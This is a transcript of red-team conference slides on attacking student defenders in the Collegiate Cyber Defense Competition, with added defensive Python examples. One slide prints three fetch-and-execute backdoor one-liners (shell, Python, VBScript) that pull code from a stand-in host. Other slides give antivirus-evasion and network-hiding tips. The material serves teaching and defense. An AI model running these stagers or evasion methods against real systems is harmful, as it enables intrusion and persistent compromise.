red teaming the ccdc
![Page 1: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/1.jpg)
Red Teaming the CCDC
Hacking the most paranoid student system administrators in the nation
Matt “scriptjunkie” Weeks
![Page 2: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/2.jpg)
Some funny things
Our mistakes and yours
![Page 3: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/3.jpg)
No, don’t start “aCcbsXoAIfRsU”
![Page 4: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/4.jpg)
Those other people logged in are not your friends.
![Page 5: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/5.jpg)
You planned to get hacked?
![Page 7: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/7.jpg)
![Page 8: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/8.jpg)
![Page 9: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/9.jpg)
![Page 10: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/10.jpg)
![Page 11: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/11.jpg)
![Page 12: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/12.jpg)
![Page 13: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/13.jpg)
![Page 14: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/14.jpg)
A year of curating red team wallpaper
![Page 15: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/15.jpg)
![Page 16: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/16.jpg)
Gotta keep up with changing memes
![Page 17: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/17.jpg)
The red team has you
![Page 18: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/18.jpg)
![Page 19: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/19.jpg)
Screenshot inception!
![Page 20: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/20.jpg)
![Page 21: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/21.jpg)
Personal Favorite
https://www.youtube.com/watch?v=TrnUO6TLrtE
![Page 22: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/22.jpg)
The malware games
Challenges writing malware
![Page 23: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/23.jpg)
Requirements
Full-featured RAT
File access
Interactive shell
Screenshots, keylogger
May include stealth features
Basic backdoors
Used for re-establishing full-featured RAT
Simple command and/or shellcode execution
Callback or listening
Keylogger/persistent monitoring
File packing tools
Worms – every method possible
![Page 24: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/24.jpg)
Compatibility is hard
Windows XP – Win 8.1
Hook-based keylogging fails…
*NIX’s
Make Windows look great
No two Linux distros start up the same
OS X(!)
NetBSD
OpenBSD
FreeBSD
X64/x86
OpenIndiana (Solaris)
Ubuntu
Fedora
Linux Mint
![Page 25: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/25.jpg)
But hard work pays off, kids
![Page 26: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/26.jpg)
On-the-fly backdoors
Usually you are caught off-guard with at least one system
Webshell collections are your friend
Scripting skills are a must
```
while [ true ] ; do wget -O - http://a.bc/def | sh ; sleep 10 ; done
```
```
eval(urllib2.urlopen('http://a.bc/def').read())
```
```
echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET","http://a.bc/def",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs
```
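All three stagers on this slide share one shape: fetch code over HTTP and hand it straight to an interpreter. From the defender's side, that shape is what to hunt for in process-creation telemetry (auditd EXECVE records, Sysmon event 1, shell history), not any particular URL. The Python below is an added example and not part of the talk; the rule names, the log format and the log lines (hostnames replaced with example.invalid) are constructed for it.

```python
"""Flag fetch-and-execute one-liners in process command-line telemetry.

Added example (not from the talk). Each rule describes the fetch+execute
shape rather than a specific host, so a renamed URL does not evade it.
"""
import re
from typing import List, Tuple

# (rule name, compiled pattern); names are made up for this example.
RULES: List[Tuple[str, "re.Pattern[str]"]] = [
    ("shell fetch piped to interpreter",
     re.compile(r"\b(wget|curl)\b[^|;&]*\|\s*(ba|z|da|k)?sh\b", re.I)),
    ("python eval/exec of urlopen body",
     re.compile(r"\b(eval|exec)\s*\(.*\burlopen\s*\(", re.I)),
    ("vbscript Execute of HTTP response",
     re.compile(r"\bMicrosoft\.XMLHTTP\b.*\bExecute\b.*\bresponseText\b", re.I)),
    ("looping re-fetch (persistence loop)",
     re.compile(r"\bwhile\b.*\b(wget|curl)\b.*\bsleep\b", re.I)),
]


def classify(cmdline: str) -> List[str]:
    """Return the names of every rule that matches one command line."""
    return [name for name, rx in RULES if rx.search(cmdline)]


def scan(lines: List[str]) -> List[Tuple[int, List[str]]]:
    """Return (line_index, matched_rule_names) for each suspicious line."""
    hits = []
    for i, line in enumerate(lines):
        matched = classify(line)
        if matched:
            hits.append((i, matched))
    return hits


# Constructed telemetry: two benign lines, then the three shapes from the
# slide with the host replaced by example.invalid.
SAMPLE_LOG = [
    "user=www-data cmd=/usr/sbin/apache2 -k start",
    "user=alice cmd=wget -O report.pdf https://example.invalid/report.pdf",
    "user=root cmd=sh -c 'while [ true ]; do wget -O - http://example.invalid/x | sh; sleep 10; done'",
    "user=root cmd=python -c \"eval(urllib2.urlopen('http://example.invalid/x').read())\"",
    'user=admin cmd=cmd.exe /c echo Set x=CreateObject("Microsoft.XMLHTTP"):x.Open "GET","http://example.invalid/x",False:x.Send:Execute x.responseText >>v.vbs&start v.vbs',
]

if __name__ == "__main__":
    for idx, names in scan(SAMPLE_LOG):
        print(f"line {idx}: {', '.join(names)}")
```

The benign `wget` download on the second line is deliberately left unflagged: the rules require the pipe into an interpreter or the re-fetch loop, which is what separates a download from a stager.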
![Page 27: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/27.jpg)
First world red team problems:
I accidentally six or seven keylogger copies
![Page 28: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/28.jpg)
On Antivirus
-or- why does everybody use MBAM?
![Page 29: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/29.jpg)
Process
Write malware
Does AV detect?
  Yes: look for shady code, obfuscate functions and strings
  No: Done!
![Page 30: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/30.jpg)
But usually
Write malware
Does AV detect?
  No: Done!
![Page 31: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/31.jpg)
AV test lab
Top market share AV’s (Internet Security Suite version) on default settings
7 “fresh” tests (results BEFORE I knew what any of the AV’s would detect)
![Page 32: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/32.jpg)
Why not VirusTotal?
![Page 33: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/33.jpg)
Test 1: Widely known malware with 1 byte appended
The only way to fail is by using giant hash lists instead of real signatures
Results (12 products; vendor logos not in the transcript): 6 WIN, 6 FAIL
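Why appending one byte is enough to defeat a hash list but not a real signature, as an added example that is not part of the talk: a digest changes completely on any modification, while a content signature matches a fixed byte sequence wherever it sits in the file. The "known sample" below is a constructed placeholder blob, not real malware, and the class and signature names are made up for the example.

```python
"""Hash-list detection versus content-signature detection.

Added example (not from the talk). KNOWN_SAMPLE is a constructed stand-in for
a 'widely known' file: a fake PE header plus a distinctive marker string.
"""
import hashlib
from typing import Dict, Set, Tuple


def sha256(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


class HashListDetector:
    """Detects only files whose exact digest is already on the list."""

    def __init__(self, known_digests: Set[str]):
        self.known = known_digests

    def detect(self, data: bytes) -> bool:
        return sha256(data) in self.known


class PatternDetector:
    """Detects a file if any signature byte sequence occurs anywhere in it."""

    def __init__(self, signatures: Dict[str, bytes]):
        self.signatures = signatures

    def detect(self, data: bytes) -> bool:
        return any(sig in data for sig in self.signatures.values())


# Constructed inputs (labelled as such): not real samples.
KNOWN_SAMPLE = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"CONSTRUCTED_MARKER_v1" + b"\x90" * 32
APPENDED_SAMPLE = KNOWN_SAMPLE + b"\x00"          # the Test 1 modification
BENIGN_FILE = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"hello world"


def run_test(sample: bytes) -> Tuple[bool, bool]:
    """Return (hash_list_hit, pattern_hit) for one file."""
    hashes = HashListDetector({sha256(KNOWN_SAMPLE)})
    patterns = PatternDetector({"marker_v1": b"CONSTRUCTED_MARKER_v1"})
    return hashes.detect(sample), patterns.detect(sample)


if __name__ == "__main__":
    for label, blob in [("known", KNOWN_SAMPLE), ("known+1 byte", APPENDED_SAMPLE), ("benign", BENIGN_FILE)]:
        h, p = run_test(blob)
        print(f"{label:14s} hash-list={'WIN' if h else 'FAIL'}  signature={'WIN' if p else 'FAIL'}")
```

A product that only looks up digests gets the first row right and the second wrong, which is exactly the FAIL column in this test; the signature check is unaffected by the trailing byte.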
![Page 34: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/34.jpg)
Test 2: Malware with public code samples
Results (12 products; vendor logos not in the transcript): 12 FAIL
![Page 35: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/35.jpg)
Test 3: One-off malware with no evasions
Results (12 products; vendor logos not in the transcript): 3 WIN, 7 FAIL, 2 INDECISIVE
![Page 36: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/36.jpg)
Test 4: “Chris’s Ex-Girlfriend” – Highly evasive malware workhorse
Results (12 products; vendor logos not in the transcript): 12 FAIL
![Page 37: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/37.jpg)
Test 5: “The Kraken” – Sneaky firewall-evading malware
Results (12 products; vendor logos not in the transcript): 1 WIN, 11 FAIL
![Page 38: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/38.jpg)
Test 6: Worm with no evasions
Results (12 products; vendor logos not in the transcript): 2 WIN, 9 FAIL, 1 hosed the VM
![Page 39: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/39.jpg)
Test 7: Legit program used maliciously
Results (12 products; vendor logos not in the transcript): 11 FAIL, 1 INDECISIVE
![Page 40: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/40.jpg)
Notes
Symantec was only AV to detect reverse meterpreter on the wire
Kaspersky’s behavioral emulation detected one worm well
Kaspersky and Comodo both recognized at least one piece of malware as unusual (not on whitelist), but not necessarily bad
Trend Micro was only AV to block hash dumping
Panda, Avast gave errors installing and were not tested
![Page 41: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/41.jpg)
Final standings
Results (12 products; vendor logos not in the transcript): 6 × FAIL (100% FAIL), 3 × meh, 2 × TIED 1st, 1 × 3rd
![Page 42: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/42.jpg)
Just kidding. After 2 hours obfuscating, these are the real final standings:
Results (12 products; vendor logos not in the transcript): 12 FAIL
![Page 43: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/43.jpg)
How do I bypass AV?
Write your own stuff
Dynamically resolve API calls
Obfuscate strings
Introduce environmental/system dependencies to generically thwart sandboxing
Write your own stuff
Impersonate legitimate software
Watch what hits disk
Digitally sign your stuff if you can
Write your own stuff
![Page 44: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/44.jpg)
Security Software Lessons
Some AV’s are a total fail
MalwareBytes Pro is in this list with MS, McAfee, F-Secure
Many have one really cool feature or heuristic
Kaspersky, Symantec, Trend Micro
All can be bypassed easily for most malware
Only detection remaining after 2 hours was one worm vs Kaspersky
![Page 45: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/45.jpg)
Hiding from the students
![Page 46: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/46.jpg)
Hiding from the students
Host hiding
Hide while running
Hide start
Meterpreter is great for functionality, bad for persistence
Mostly custom malware
Mostly standard persistence methods
Don’t run in your own process
Don’t use any of those toy languages with dependencies
Use C!
![Page 47: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/47.jpg)
Don’t hide stuff rootkit finders look for
![Page 48: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/48.jpg)
Don’t sweat the one-offs
![Page 49: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/49.jpg)
Hiding on the wires
Hiding from Wireshark
Harder than hiding on host
Try to blend in with normal traffic
Throw Wireshark crashers
Remove packets from view
Hiding from netstat/tcpview
Using HTTP(S) instead of TCP callbacks doesn’t leave connection open
If that fails, blend in by using common ports and cloud IP’s
Migrate session to web browser or critical process
![Page 50: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/50.jpg)
Hiding on the wires
Use every protocol that gets out
TCP
UDP
HTTPS
DNS
Use hop points in cloud/web hosting
Use file sharing/paste/social media sites
Random callback selection and delays to avoid monitors
Any way students can send or receive info, you can too
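The slide's advice to use random callback selection and delays is aimed at the traffic monitoring that the "Defenses that hurt" slide lists later. Jitter defeats a monitor that looks for an exact period, but it leaves a statistical footprint: an implant's inter-arrival gaps stay tightly clustered around their mean while human browsing is bursty. The Python below is an added defender-side example, not part of the talk; it scores each (source, destination) pair by the coefficient of variation of its connection gaps. The log format, the IP addresses (RFC 5737 test ranges) and the thresholds (at least 8 connections, CV at or below 0.35) are constructed assumptions for the example.

```python
"""Flag near-periodic outbound callbacks despite jittered delays.

Added example (not from the talk). Regularity is measured as
cv = pstdev(gaps) / mean(gaps) over the sorted connection timestamps of one
(src, dst:port) pair; a low cv with many connections is beacon-like.
"""
from collections import defaultdict
from itertools import accumulate
from statistics import mean, pstdev
from typing import Dict, List, Tuple

Key = Tuple[str, str]


def parse_log(lines: List[str]) -> Dict[Key, List[float]]:
    """Group timestamps by (src, dst). Constructed format:
    'ts=<seconds> src=<ip> dst=<ip:port>'."""
    by_pair: Dict[Key, List[float]] = defaultdict(list)
    for line in lines:
        fields = dict(tok.split("=", 1) for tok in line.split())
        by_pair[(fields["src"], fields["dst"])].append(float(fields["ts"]))
    return by_pair


def regularity(timestamps: List[float]) -> Tuple[int, float, float]:
    """Return (connection_count, mean_gap, cv). Fewer than 3 connections
    cannot be judged and get cv = inf."""
    ts = sorted(timestamps)
    gaps = [b - a for a, b in zip(ts, ts[1:])]
    if len(gaps) < 2:
        return len(ts), 0.0, float("inf")
    m = mean(gaps)
    return len(ts), m, (pstdev(gaps) / m if m > 0 else float("inf"))


def find_beacons(lines: List[str], min_count: int = 8, max_cv: float = 0.35) -> List[Key]:
    """Pairs with enough connections and regular enough spacing to be flagged.
    min_count and max_cv are assumed thresholds, tune to the environment."""
    hits = []
    for key, stamps in parse_log(lines).items():
        count, _, cv = regularity(stamps)
        if count >= min_count and cv <= max_cv:
            hits.append(key)
    return sorted(hits)


def make_log(src: str, dst: str, start: float, gaps: List[float]) -> List[str]:
    """Build constructed log lines: one connection at start, then one per gap."""
    return [f"ts={t:.3f} src={src} dst={dst}" for t in accumulate(gaps, initial=start)]


# Constructed traffic (labelled as such):
BEACON_GAPS = [9.2, 11.1, 10.4, 8.8, 10.9, 9.5, 10.2, 11.6, 9.0, 10.3]  # ~10 s plus jitter
BROWSE_GAPS = [0.3, 0.5, 45.0, 2.0, 120.0, 0.4, 0.6, 300.0, 1.5, 0.2]   # bursty human use
SAMPLE_LOG = (
    make_log("10.0.0.5", "203.0.113.10:443", 1000.0, BEACON_GAPS)
    + make_log("10.0.0.7", "198.51.100.20:443", 1000.0, BROWSE_GAPS)
    + make_log("10.0.0.9", "198.51.100.30:443", 1000.0, [10.0, 10.0])  # too few to judge
)

if __name__ == "__main__":
    for key, stamps in parse_log(SAMPLE_LOG).items():
        count, m, cv = regularity(stamps)
        print(f"{key[0]} -> {key[1]}: n={count} mean_gap={m:.1f}s cv={cv:.2f}")
    print("flagged:", find_beacons(SAMPLE_LOG))
```

The third pair shows the limit of a per-pair check: random callback selection across several hop points keeps each destination's count below the threshold, so the same statistic is worth running per source host against the set of all external destinations as well.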
![Page 51: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/51.jpg)
Dealing with firewalls
Two types
Host
Network
Host firewalls
Usually don’t stop outbound traffic
Can go underneath, watch raw packets
Frequently add exceptions or drop the firewall
![Page 52: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/52.jpg)
Network firewalls
Great to own
Tough if you don’t
Use service ports since they must be able to reach the hosts
![Page 53: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/53.jpg)
Defenses that hurt
Patch or block RCE’s
Strict inbound and outbound network firewall rules
Traffic monitoring
Different passwords on all the boxes
Pull the plug
Reverting (sometimes)
Realizing that sometimes, the red team can’t hurt you as much as finishing injects helps you
![Page 54: Red teaming the CCDC](https://reader034.vdocuments.us/reader034/viewer/2022050905/54b5ed284a79591a7f8b480a/html5/thumbnails/54.jpg)
Questions
@scriptjunkie1
https://scriptjunkie.us/